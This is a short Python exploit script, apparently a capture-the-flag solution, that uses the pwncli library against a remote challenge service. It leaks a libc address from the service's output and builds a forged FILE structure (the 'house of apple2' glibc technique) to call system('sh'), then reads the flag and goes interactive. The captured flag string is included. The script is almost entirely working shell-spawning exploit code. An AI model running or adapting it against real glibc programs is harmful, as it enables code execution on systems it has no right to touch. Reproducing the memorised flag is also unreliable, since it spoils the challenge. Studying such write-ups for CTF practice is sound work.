```python
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# run this script: python3 ./exp.py re flu.xxx:11801

# flu.xxx 11801
# flag{wh0_n33ds_w1de_dat4_vt4bl3s_4nyway5?}

from pwncli import *
cli_script()
set_remote_libc('libc.so.6')
context.arch="amd64"

libc: ELF = gift.libc

ru("Here is your foundation: ")
msg = rl()
stdout_addr = int16_ex(msg[:-1])
leak("stdout", stdout_addr)
lb = set_current_libc_base_and_log(stdout_addr, "_IO_2_1_stdout_")

# use house of apple2 to attack
# https://www.roderickchan.cn/post/house-of-apple-%E4%B8%80%E7%A7%8D%E6%96%B0%E7%9A%84glibc%E4%B8%ADio%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95-2/
data = IO_FILE_plus_struct().house_of_apple2_execmd_when_exit(stdout_addr, libc.sym._IO_wfile_jumps, libc.sym.system, "sh")[:0xe0-1]
s(data)
sleep(1)
sl("cat flag*")

ia()
```